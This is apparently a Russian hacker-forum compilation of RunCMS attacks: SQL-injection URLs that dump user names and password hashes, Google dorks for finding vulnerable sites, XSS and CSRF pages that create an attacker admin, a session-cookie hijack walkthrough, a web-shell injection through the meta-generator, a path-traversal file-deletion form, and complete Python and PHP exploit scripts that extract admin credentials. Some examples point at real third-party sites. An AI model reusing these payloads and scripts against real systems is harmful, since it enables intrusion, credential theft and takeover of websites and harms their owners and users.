Обзор уязвимостей RunCMS Сайт производителя: www.runcms.org Актуальная версия: 1.6.1 Exploits Цель: RunCMS <= 1.2 Воздействие: Выполнение произвольных команд RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit Цель: RunCms 1.5.2 и более ранние версии Воздействие: SQL-инъекция RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit Цель: RunCMS <= 1.6 Воздействие: Выполнение произвольных команд RunCMS <= 1.6 Local File Inclusion Vulnerability Цель: RunCMS 1.6 и более ранние версии Воздействие: Выполнение произвольных команд RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit Цель: RunCMS 1.6 Воздействие: SQL-инъекция RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit Цель: RunCMS 1.6 Воздействие: SQL-инъекция RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion) Цель: RunCMS Newbb_plus 0.92 и более ранние версии Воздействие: SQL-инъекция RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit 1. Multiple Blind SQL Injection Attacker can inject SQL code in modules: Code: http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION Example: This query will return link to download file: Code: GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0 This query will return error: Code: GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0 2. Stored XSS Vulnerability found in script modules/news/submit.php in post parameter name "subject" Example: Code: POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0 subject=<script>alert("DSecRG_XSS")</script> 3. Linked XSS vulnerability found in modules/news/index.php, attacker can inject XSS in URL string: Example: Code: http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script> 3. This page can be overwritten by PHP injection: Code: runcms_1.6\modules\sections\cache\intro.php runcms_1.6\modules\mylinks\cache\disclaimer.php runcms_1.6\modules\mydownloads\cache\disclaimer.php runcms_1.6\modules\newbb_plus\cache\disclaimer.php runcms_1.6\modules\system\cache\disclaimer.php runcms_1.6\modules\system\cache\footer.php runcms_1.6\modules\system\cache\header.php runcms_1.6\modules\system\cache\maintenance.php V. 1.3a5 XSS Code: http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code] RUNCMS 1.5.1 SQL Injection Code: http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2 //milw0rm.com
Нашел слепую скулю в runcms, начал проверять боян ли, оказалось что скуля была найдена до меня, но на ачате нет, поэтому выкладываю, уязвимость в параметре "bid" сценария "modules/banners/click.php" Пример: http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version(),1,1)=4
1) RunCMS MyAnnonces SQL Injection(cid) Code: # AUTHOR : S@BUN # # HOME 1 : http://www.milw0rm.com/author/1334 # # MA─░L : [email protected] # ################################################################ # # DORK 1 : allinurl: "modules MyAnnonces index php pa view" # ################################################################ EXAMPLE XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT] EXPLOIT : for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/* for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/* 2) RunCMS 1.6.1 Multiple XSS and XSRF HTML: ################################################################### RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN ################################################################### [b] 1) Create Webmaster (admin) XSRF Vulnerability[/b] <html><head></head><body onLoad="javascript:document.attack.submit()"> <form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r"> <input type="hidden" name="uname" value="Attacker"> <input type="hidden" name="name" value="Attacker"> <input type="hidden" name="email" value="[email protected]"> <input type="hidden" name="url" value=""> <input type="hidden" name="user_avatar" value="blank.gif"> <input type="hidden" name="theme" value="helloween"> <input type="hidden" name="timezone_offset" value="0"> <input type="hidden" name="language" value="deutsch"> <input type="hidden" name="user_icq" value=""> <input type="hidden" name="user_aim" value=""> <input type="hidden" name="user_msnm" value=""> <input type="hidden" name="user_from" value=""> <input type="hidden" name="user_occ" value=""> <input type="hidden" name="user_intrest" value=""> <input type="hidden" name="user_birth%5b2%5D" value=""> <input type="hidden" name="user_birth%5B1%5D" value=""> <input type="hidden" name="user_birth%5BO%5D" value=""> <input type="hidden" name="user_sig" value=""> <input type="hidden" name="umode" value="flat"> <input type="hidden" name="uorder" value="1"> <input type="hidden" name="bio" value=""> <input type="hidden" name="rank" value="7"> <input type="hidden" name="pass" value="Password"> <input type="hidden" name="pass2" value="Password"> <input type="hidden" name="fct" value="users"> <input type="hidden" name="op" value="addUser"> <input type="hidden" name="submit" value="%DCbernehmen"> Also with XSRF an attacker can update the profile of all users. He can change the password etc... [b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b] <html><head></head><body onLoad="javascript:document.r.submit()"> <form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r"> <input type="text" class="text" name="rank_title" size="30" maxlength="50" value="<marquee>Cross-Site Scritping :-("/> <input type="hidden" name="fct" value="userrank"> <input type="hidden" name="op" value="RankForumAdd"> </form> </body>
RUNCMS 1.6.1 Добавка комментария ----------------------------- Неправильная обработка BB Code => Active XSS Пример: Code: [*color]</textarea>[COLOR=Red][XSS][/COLOR][/*color] Component Partner Sites 1.03 SQL Injection (Admin priv) Exploit: Code: modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1 Component Web Links 1.02 SQL Injection (Admin priv) Exploit: Code: modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1 Hashing algorithm PHP: $pass = sha1($username.$pass); © ZAMUT
RunCMS Module section (artid) Remote SQL Injection Vulnerability Code: Cr@zy_King [email protected] / hackshow.us Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91 Runcms Module Section (artid) Remote Sql İnj. Vuln. Example : - modules/sections/index.php?op=viewarticle&artid=Sql - Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2 Cr@ Says : Kurtlar Vadisinde Memati Ölmeyecek kimse heyecanlanmasın :D Alemin_Krali Says : Aynen katılıyorum (ne alaka ise a.q) Good. # milw0rm.com [2008-03-20]
RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability SQL Injection Vulnerable: Module Photo 3.02 Exploit: Code: admin modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/* pass modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/* Dork: Code: allinurl: "modules/photo/viewcat.php?id" inurl:photo "powered by runcms" © S@BUN
RunCMS Module nGuestBook 1.01 Active XSS Add message => Message => [XSS] dork: inurl:/modules/nguestbook/ SQL Injection Vulnerable: Module Photo 4.00 Vuln code: PHP: ..... include_once(PHOTO_PATH."/class/bama_cat.php"); $id = $HTTP_GET_VARS['id']; if (isset($HTTP_GET_VARS['cid'])) { ..... Exploit: Code: http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1 ZAMUT (c)
RunCMS Module MyArticles 0.0.4-0.5 sql-inj Sql-inj в параметре topic_id, GET фильтруется, поэтому данные нужно посылать POST-ом Code: http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users © H00k
RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability SQL Injection http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL] Code: -2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users milw0rm.com
RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability Vuln code: PHP: ..... include(XOOPS_ROOT_PATH."/header.php"); $tid = $HTTP_GET_VARS['tid']; if ($HTTP_GET_VARS['page']) { $page = $HTTP_GET_VARS['page']; ..... Exploit: Code: /modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users Example: Code: http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users dork: /modules/HotNews/ ZAMUT(c)
Способ если прокатила скуля и нет возможности сбрутить хеш! 1. Регаем акк на сайте (жертва) 2. В моем случае проведенная скуль имела вид Code: modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,hash,4,5,uname,7,8,9,10+from+runcms_session+where+uid=3 Таким макаром выводим hash-session админа (не забываем про id)! Вывело что-то в этом роде eb5cafcd8afa7edf125edfa35c55c73e425bd1d0 3. Логонимся под реганым акком, смотрим наши куки Примерно вот такой вид: Code: a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753% наш id = 20001 и сессия = e2ef357450c7c647fa5c813808d1500273407483 4. Меняем на id админа (в моем случае id = 00003) и сессия = eb5cafcd8afa7edf125edfa35c55c73e425bd1d0 Получаем след.: Code: a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2200003%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7D Менял куки через плагин в лисе ставил галку напротив Session cookies и обновлял страницу . И мы в админке. Спасибо за внимание!
RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability Vuln code: PHP: ..... global $xoopsConfig, $db, $HTTP_POST_VARS, $myts, $eh; $lid = $HTTP_POST_VARS['lid']; $title = $HTTP_POST_VARS['title']; ..... Exploit: Code: /modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users ZAMUT (c)
RunCMS Module Arcade 1.28 (gid) Remote SQL Injection Vulnerability Vuln code: PHP: global $HTTP_POST_VARS, $HTTP_GET_VARS, $myts; $commit = isset($HTTP_POST_VARS['commit']) ? $HTTP_POST_VARS['commit'] : $HTTP_GET_VARS['commit']; $gid = isset($HTTP_POST_VARS['gid']) ? $HTTP_POST_VARS['gid'] : $HTTP_GET_VARS['gid']; Exploit: Code: /index.php?act=play_game&gid=-999999+union+select+1,2,3,4,pass,6,7,8,9,10,11,12,13,14+from+runcms_users ZAMUT(c)
RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit Code: #!/usr/bin/python """ #=================================================================================================# # ____ __________ __ ____ __ # # /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ # # | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ # # | | | \ | |/ \ \___| | /_____/ | || | # # |___|___| /\__| /______ /\___ >__| |___||__| # # \/\______| \/ \/ # #=================================================================================================# # This is a public Exploit # #=================================================================================================# # Runcms <= 1.6.1 # # Sql Injection Vulnerability # # Benchmark Method # #=================================================================================================# # .-= In memory of our friend rGod =-. # #====================================#===========#====================================#===========# # Server Configuration Requirements # # Some Information # # #====================================# #====================================# # # # # # magic_quotes_gpc = 0 # Vendor: runcms.org # # # Author: The:Paradox # #================================================# Severity: Moderately Critical # # # # # Uff... I have to find something to put here... # Proud To Be Italian. # # # # #====================================#===========#================================================# # Proof Of Concept / Bug Explanation # # #====================================# # # # # This time i'm really too lazy to write a long PoC. # # $msg_image (but also $msg_attachment) is unproperly checked when calling store() # # function (modules/messages/class/pm.class.php) # # Sql injection in insert syntax (whatever I am not using blind attack). Prefix knowledge needed. # # # #=================================================================================================# [modules/messages/class/pm.class.php] 64. function store() { 65. global $db, $upload; 66. 67. if ( !$this->isCleaned() ) { 68. if ( !$this->cleanVars() ) { 69. return false; 70. } 71. } 72. 73. foreach ( $this->cleanVars as $k=>$v ) { 74. $$k = $v; 75. } 76. 77. if ( empty($msg_id) ) { 78. 79. $msg_id = $db->genId($db->prefix('private_msgs').'_msg_id_seq'); 80. 81. $sql = " 82. INSERT INTO ".$db->prefix("private_msgs")." SET 83. msg_id=".intval($msg_id).", 84. msg_image='$msg_image', 85. msg_attachment='$msg_attachment', 86. subject='$subject', 87. from_userid=".intval($from_userid).", 88. to_userid=".intval($to_userid).", 89. msg_time=".time().", 90. msg_text='$msg_text', 91. read_msg=0, 92. type='".$type."', 93. allow_html=".intval($allow_html).", 94. allow_smileys=".intval($allow_smileys).", 95. allow_bbcode=".intval($allow_bbcode).", 96. msg_replay=".intval($msg_replay).""; 97. } 98. 99. if ( !$result = $db->query($sql) ) { 100. $this->errors[] = _NOTUPDATED; 101. return false; 102. } 103. 104. return true; 105. } #=================================================================================================# # There are other vulnerabilities in this CMS. Find them by yourself. # #=================================================================================================# # Use this at your own risk. You are responsible for your own deeds. # #=================================================================================================# # Python Exploit Starts # #=================================================================================================# """ import urllib, urllib2 from sys import argv, exit main = """ #================================================================# # Runcms <= 1.6.1 # # Sql Injection Vulnerability # # Discovered By The:Paradox # # # # rGod is still alive in our hearts # # # # Usage: # # ./homerun [Target+path] [TargetUid] [ValidUserCookie] # # ./homerun --help (to print an example) # #================================================================# """ prefix = "runcms_" if len(argv)>=2 and argv[1] == "--help": print "\nuser@linux:~/Desktop$ ./homerun http://localhost/web/runcms/ 1 rc_sess=a%3A3%3A%7Bi%3A0%3Bi%3A3%3Bi%3A1%3Bs%3A40%3A%228b394462d67198707aea362098001610d35687ff%22%3Bi%3A2%3Bi%3A1212933002%3B%7D;\n\n" + main + "\n\n[.] Exploit Starting.\n[+] Sending HTTP Request...\n[+] A message with username and password of user with id 1 has been sent to user with id 3.\n -= The:Paradox =-" else: print main if len(argv)<=3: exit() else: print "[.] Exploit Starting." host = argv[1] tuid = argv[2] cookie = argv[3] try: uid = cookie.split("a%3A3%3A%7Bi%3A0%3Bi%3A")[1].split("%3Bi%3A1%3Bs%3A40%3A%")[0] except: exit("[-] Invalid cookie") sql = "icon12.gif', msg_attachment='', subject='Master, all was done.', from_userid=" + str(uid) + ", to_userid=" + str(uid) + ", msg_time=0, msg_text=concat('Master, password hash for ',(select uname from " + prefix + "users where uid=" + tuid + "),' is ',(select pass from " + prefix + "users where uid=" + tuid + ")), read_msg=0, type='1', allow_html=0, allow_smileys=1, allow_bbcode=1, msg_replay=0/*" print "[+] Sending HTTP Request..." values = {'subject' : 'Master attack failed.', 'message' : 'Probably mq = 1 or system patched.', 'allow_html' : 0, 'allow_smileys' : 1, 'allow_bbcode' : 0, 'msg_replay' : 1, 'submit' : '1', 'msg_image' : sql, 'to_userid' : uid } headers = {'Cookie' : cookie, 'Content-Type' : 'application/x-www-form-urlencoded'} req = urllib2.Request(host + "/modules/messages/pmlite.php", urllib.urlencode(values), headers) response = urllib2.urlopen(req) if response.read().find('Your message has been posted.') != -1: print "[+] A message with username and password of user with id " + tuid + " has been sent to user with id " + uid + ".\n -= The:Paradox =-" else: print "[-] Unable to send message" # milw0rm.com [2008-05-08]
в админке Читалка (все версии). конфиг к бд Code: http://localhost/runcms/class/debug/highlight.php?file=../../mainfile.php можно троянить все странички cms: Тут радактируем хидер либо футер, как нам нужно, я вставлял ифр Code: http://localhost/runcms/modules/system/admin.php?fct=meta-generator ну и хз за чем они нужны, но пусть будут. SQL-inj. Code: /modules/system/admin.php?fct=smilies&op=SmilesEdit&id=-1+union+select+1,pass,3,4+from+runcms_users /modules/system/admin.php?fct=userrank&op=RankForumEdit&rank_id=-1+union+select+1,pass,3,4,5,6+from+runcms_users ZAMUT (c)
Заливка шелла в RunCMS Заливка шелла в RunCMS через Meta-Generator Уязвимый кусок кода: Code: ....... $content .= "\$meta['follow'] = \"".$_POST["Xfollow"]."\";\n"; $content .= "\$meta['pragma'] = \"".$_POST["Xpragma"]."\";\n"; $content .= "\$meta['icon'] = \"".$_POST["Xicon"]."\";\n"; ....... write_file("meta", $content, "w"); Идем в: Code: http://localhost/runc/modules/system/admin.php?fct=meta-generator поле Bookmark Icon имеет вид: Code: ../../favicon.ico правим так: Code: ../../favicon.ico";echo `$_REQUEST[c]`;# теперь файл с этой опцией (\modules\system\cache\meta.php) выглядит так: Code: ......... $meta['rating'] = "general"; $meta['p3p'] = ""; $meta['index'] = "index"; $meta['follow'] = "follow"; $meta['pragma'] = ""; $meta['icon'] = "../../favicon.ico";echo `$_REQUEST[c]`;#"; ......... Т.е. классический php-injection, как видим теперь все зависит от нашей фантазии используем так: Code: http://localhost/runc/modules/system/admin.php?fct=meta-generator&c=dir Имхо, метод вообще безпалевный (когда юзать будем POST) Так же, как вариант, можно инклудить смайл/аватарку с добавленным в нее php-кодом (после заливки лежать она будет тут ../../images/smilies/smile.gif ) ZAMUT (c)
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure ex RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit PHP: <?php print_r(' -------------------------------------------------------------------------- RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork: "Runcms Copyright" "2002 - 2007" +"page created" --------------------------------------------------------------------------- '); /* software site: http://www.runcms.org/modules/news/ vulnerable code in /class/debug/debug_show.php: <?php ... include_once("../../mainfile.php"); include_once("../../header.php"); switch($_POST['debug_show']) { case "show_files": show_files($_POST['loaded_files']); break; case "show_queries": show_queries($_POST['executed_queries'], $_POST['sorted']); break; } include_once("../../footer.php"); ?> no authentication is performed to run show_files() and show_queries() functions, look at this now in /class/debug/debug.php: ... function show_queries($executed_queries, $sorted=0) { global $db; $executed_queries = unserialize(urldecode($executed_queries)); if ($sorted == 1) { sort($executed_queries); $is_sorted = _DBG_SORTEDR; } else { array_reverse($executed_queries); $is_sorted = _DBG_NSORTEDR; } OpenTable(); $fulldebug = " <h4>($is_sorted) "._DBG_QEXECED.": ".count($executed_queries)."</h4> <table width='100%' cellpadding='3' cellspacing='1'>"; $size = count($executed_queries); for ($i=0; $i<$size; $i++) { $stime = get_micro_time(); $query = $db->query("EXPLAIN ".$executed_queries[$i].""); $querytime = (get_micro_time() - $stime); $totaltime += $querytime; $fulldebug .= "<tr> <td nowrap='nowrap' class='bg2'><b>"._DBG_QUERY.": ".($i+1)."</b></td> <td colspan='7' class='bg3'>$executed_queries[$i]</td> </tr><tr> <td nowrap='nowrap' class='bg2'><b>"._DBG_TIME.":</b></td> <td colspan='7' class='bg3'>".round($querytime, 4)." "._DBG_SECONDS."</td> </tr><tr> <td nowrap='nowrap' class='bg2'><b>"._DBG_TABLE.":</b></td> <td nowrap='nowrap' class='bg2'><b>"._DBG_TYPE.":</b></td> <td nowrap='nowrap' class='bg2'><b>"._DBG_POSSKEYS.":</b></td> <td nowrap='nowrap' class='bg2'><b>"._DBG_KEY.":</b></td> <td nowrap='nowrap' class='bg2'><b>"._DBG_KEYLEN.":</b></td> <td nowrap='nowrap' class='bg2'><b>ref:</b></td> <td nowrap='nowrap' class='bg2'><b>"._DBG_ROWS.":</b></td> <td nowrap='nowrap' class='bg2'><b>"._DBG_EXTRA.":</b></td> </tr>"; while ($result = $db->fetch_array($query)) { $fulldebug .= " <tr> <td class='bg3' nowrap='nowrap' {$result['table']} </td> <td class='bg3' nowrap='nowrap' {$result['type']} </td> <td class='bg3'>{$result['possible_keys']} </td> <td class='bg3' nowrap='nowrap' {$result['key']} </td> <td class='bg3' nowrap='nowrap' {$result['key_len']} </td> <td class='bg3' nowrap='nowrap' {$result['ref']} </td> <td class='bg3' nowrap='nowrap' {$result['rows']} </td> <td class='bg3'>{$result['Extra']} </td> </tr>"; } $fulldebug .= "<tr> <td colspan='8' class='bg1'>"._DBG_CUMULATED.":".round($totaltime, 4)." "._DBG_SECONDS."<hr noshade></td> </tr>"; } $fulldebug .= "</table>"; echo $fulldebug; CloseTable(); } ... we have a nice kind of sql injection here! also show_files function can be used to check the existence of certain files and retrieve the filesize or if it has been modified and so on... */ if ($argc<3) { print_r(' --------------------------------------------------------------------------- Usage: php '.$argv[0].' host path OPTIONS host: target server (ip/hostname) path: path to runcms Options: -p[port]: specify a port other than 80 -P[ip:port]: "" a proxy -T[prefix] "" a table prefix (default: runcms) Example: php '.$argv[0].' localhost /runcms/ -P1.1.1.1:80 php '.$argv[0].' localhost / -Trcms -p81 --------------------------------------------------------------------------- '); die; } error_reporting(7); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function send($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); $parts[1]=(int)$parts[1]; echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $port=80; $proxy=""; $prefix="runcms"; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=(int)str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $md5s[0]=0;//null $md5s=array_merge($md5s,range(48,57)); //numbers $md5s=array_merge($md5s,range(97,102));//a-f letters //print_r(array_values($md5s)); echo "md5 hash -> "; $j=1;$password=""; while (!strstr($password,chr(0))){ for ($i=0; $i<=255; $i++){ if (in_array($i,$md5s)){ $executed_queries=array(); //original query: EXPLAIN ... $executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(pass,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1"; $sql=urlencode(serialize($executed_queries)); $sql=str_replace("%22","%2522",$sql);//you know, urldecode()... $data ="debug_show=show_queries"; $data.="&executed_queries=".$sql; $data.="&sorted=1"; $packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; send($packet); if (eregi("_users </td>",$html)){$password.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) {die("Exploit failed...");} } $j++; } echo "\n"; echo "admin username -> "; $j=1;$admin_user=""; while (!strstr($admin_user,chr(0))){ for ($i=0; $i<=255; $i++){ $executed_queries=array(); $executed_queries[0]="SELECT null FROM ".$prefix."_users WHERE 1=(IF((ASCII(SUBSTRING(uname,".$j.",1))=".$i."),1,999999)) AND rank=7 LIMIT 1"; $sql=urlencode(serialize($executed_queries)); $sql=str_replace("%22","%2522",$sql); $data ="debug_show=show_queries"; $data.="&executed_queries=".$sql; $data.="&sorted=1"; $packet ="POST ".$p."class/debug/debug_show.php HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Pragma: no-cache\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; send($packet); if (eregi("_users </td>",$html)){$admin_user.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) {die("Exploit failed...");} $j++; } ?> original url: http://retrogod.altervista.org/runcms_152_sql.html
Как узнать версию ? /index.php PHP: <meta name="robots" content="index, follow" /> <meta name="generator" content=" RUNCMS 1.5.3 (build 20071016)" /> <meta name="keywords" content="enter your keywords here" /> <meta name="description" content="Enter your site description here" />
RunCMS Module Upload Center Delete File Vulnerability version: latest -- 1.01 Showing list files Vulnerability Vuln Code: /folder.php PHP: function listfiles() { global $ucConfig, $xoopsUser, $_GET; if (!$xoopsUser) { header("Location:".XOOPS_URL."/whyregister.php"); } else { $foldername = $_GET['foldername']; $userfoldername = $xoopsUser->getVar("uid"); $userfolderpath = "./cache/files/".$userfoldername; $imgurl = XOOPS_URL."/modules/uc/cache/files/".$userfoldername."/".$foldername; $imgpath = "./cache/files/".$userfoldername."/".$foldername; $subfolderpath = $userfolderpath."/".$foldername; $total = dir_stats($userfolderpath); ..... Delete File Vulnerability Vuln Code: /folder.php PHP: function deletefile() { global $xoopsUser, $_POST; $filename = $_POST['filename']; $foldername = $_POST['foldername']; $userfoldername = $xoopsUser->getVar("uid"); if ( @file_exists("./cache/files/".$userfoldername."/".$foldername."/".$filename) ) { @unlink("./cache/files/".$userfoldername."/".$foldername."/".$filename); redirect_header("folder.php?op=listfiles&foldername=".$foldername, 3, _MD_FILEDELETEOK); } } Code: <form action="folder.php" method="post"><td width="1%" nowrap><input type="hidden" name="op" value="deletefile" /> <input type="hidden" name="foldername" value="[COLOR=Yellow]../../../../../[/COLOR]" /><input type="hidden" name="filename" value="[COLOR=Yellow].htaccess[/COLOR]" /> <input type="submit" class="button" value="Delete"></td></form> ZAMUT ©
Уязвимости модулей RunCMS RunCMS Module eCal 2.4 Blind-SQL Уязвимый продукт: Module eCal Версия: <= 2.4 Линк: http://www.runcms.ru/modules/files/showfile.php?lid=95 Дорк: "inurl:modules/ecal/" Blind-SQL Уязвимость в файле localleve.php. Уязвимый кусок кода: PHP: $query = $db->query("SELECT * FROM ".$db->prefix("ecal")." WHERE stamp >= \"$currentyear-$currentmonth-$currentday 00:00:00\" AND locationid =$lid AND valid ='yes' ORDER BY stamp"); $kat1 = $db->query("SELECT location FROM ".$db->prefix("ecal_location")." where lid=$lid"); Exploit: Code: true: /modules/ecal/localleve.php?lid=1+and+1=1 false: /modules/ecal/localleve.php?lid=1+and+1=2 Example: Code: true: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=5 false: http://www.necton.lv/modules/ecal/localleve.php?lid=1+and+substring(version(),1,1)=4
